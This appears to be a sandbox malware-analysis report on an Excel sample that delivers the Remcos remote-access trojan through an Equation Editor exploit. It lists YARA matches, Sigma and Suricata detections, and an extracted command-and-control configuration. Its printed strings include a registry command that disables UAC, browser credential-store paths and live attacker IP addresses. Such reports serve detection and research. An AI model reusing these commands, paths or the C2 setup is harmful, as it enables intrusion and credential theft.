12.2.svchost.exe.400000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
12.2.svchost.exe.400000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
12.2.svchost.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
17.2.name.exe.10b0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
17.2.name.exe.10b0000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.name.exe.10b0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.name.exe.10b0000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
17.2.name.exe.10b0000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
17.2.name.exe.10b0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
12.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
12.2.svchost.exe.400000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
12.2.svchost.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
17.2.name.exe.10b0000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
17.2.name.exe.10b0000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.name.exe.10b0000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.name.exe.10b0000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
17.2.name.exe.10b0000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
17.2.name.exe.10b0000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
11.2.name.exe.10a0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.name.exe.10a0000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.name.exe.10a0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.name.exe.10a0000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
11.2.name.exe.10a0000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
11.2.name.exe.10a0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
Click to see the 43 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 104.168.7.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3164, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3164, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3164, Protocol: tcp, SourceIp: 104.168.7.25, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\taskhostw.exe, NewProcessName: C:\Users\user\AppData\Roaming\taskhostw.exe, OriginalFileName: C:\Users\user\AppData\Roaming\taskhostw.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3564, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3260, ProcessName: taskhostw.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\taskhostw.exe, NewProcessName: C:\Users\user\AppData\Roaming\taskhostw.exe, OriginalFileName: C:\Users\user\AppData\Roaming\taskhostw.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3564, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3260, ProcessName: taskhostw.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1404, ProcessName: wscript.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3328, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3316, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1404, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3564, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3856, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3328, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3316, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 24 02 9C 59 2D EF 50 20 D1 91 9D B5 93 7A 2E 6D 2C 2A DE 2B AF 5F 79 2B F0 1D 9F 3C F0 B1 E8 C5 7E 3D 5C E5 B2 02 16 9E 1A D7 18 B5 58 68 E1 4C 11 21 7B DD 04 AF D5 D5 CD 62 44 E0 DF 63 AC 0D , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3316, TargetObject: HKEY_CURRENT_USER\Software\Rmc-FI789R\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T16:40:02.455454+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.22	49171	107.173.4.16	2404	TCP
2024-10-12T16:40:03.589923+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.22	49172	107.173.4.16	2404	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T16:39:56.817090+0200	2022050	1	A Network Trojan was detected	104.168.7.25	80	192.168.2.22	49170	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T16:39:56.905812+0200	2022051	1	A Network Trojan was detected	104.168.7.25	80	192.168.2.22	49170	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T16:40:03.717468+0200	2803304	3	Unknown Traffic	192.168.2.22	49173	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for submitted file

Source: PO-00006799868.xls	ReversingLabs: Detection: 13%
Source: PO-00006799868.xls	Virustotal: Detection: 14%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO-00006799868.xls

Joe Sandbox ML: detected

Source: name.exe, 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2c49e6e3-a

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.168.7.25 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\taskhostw.exe

Jump to behavior

Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.dr	Stream path '_1790234746/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.dr	Stream path '_1790234751/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: name.exe, 0000000B.00000003.456762758.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.456458647.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485897066.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485739921.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0021449B GetFileAttributesW,FindFirstFileW,FindClose,	10_2_0021449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0021C75D FindFirstFileW,FindClose,	10_2_0021C75D
